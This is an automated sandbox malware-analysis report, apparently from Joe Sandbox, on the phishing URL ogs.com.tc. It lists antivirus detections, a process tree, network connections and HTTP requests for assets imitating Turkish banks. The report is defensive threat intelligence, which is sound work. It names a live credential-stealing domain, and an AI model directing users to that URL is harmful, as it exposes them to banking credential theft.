Edit tour

Windows Analysis Report
https://www.ogs.com.tc/

Overview

General Information

Sample URL:	https://www.ogs.com.tc/
Analysis ID:	1447545
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2208,i,2536867606534393903,12110685460829100041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.ogs.com.tc/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://www.ogs.com.tc/	Avira URL Cloud: detection malicious, Label: phishing
Source: https://www.ogs.com.tc/	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Antivirus detection for URL or domain

Source: https://www.ogs.com.tc/assets/images/banks/finans.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/ptt.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/alternatif.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/ziraat.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/deniz.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/vakif.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/sekerbank.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/akbank.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/turkiyefinans.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/hsbc.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/halk.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/teb.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/edkkds.svg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/ykb.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/isbank.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/garanti.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/kuveyt.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/albaraka.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/1.png	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/favicon-196x196.png	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/anadolu.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/css/style.css	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/odea.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/js/script.js	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/fiba.jpg	Avira URL Cloud: Label: phishing
Source: https://www.ogs.com.tc/assets/images/banks/ing.jpg	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: www.ogs.com.tc	Virustotal: Detection: 7%			Perma Link
Source: ogs.com.tc	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for submitted file

Source: https://www.ogs.com.tc/

Virustotal: Detection: 11%

Perma Link

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49758 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/css/style.css HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/akbank.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/albaraka.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/alternatif.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/anadolu.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/deniz.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/js/script.js HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ziraat.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ing.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/kuveyt.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/teb.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/sekerbank.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/edkkds.svg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/assets/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ptt.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ykb.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/vakif.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/odea.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/akbank.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/deniz.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/albaraka.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/anadolu.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/hsbc.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/alternatif.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ziraat.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/turkiyefinans.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/isbank.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/1.png HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/fiba.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/finans.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ogs.com.tc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/kuveyt.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/teb.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/ing.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/banks/sekerbank.jpg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/images/edkkds.svg HTTP/1.1Host: www.ogs.com.tcConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
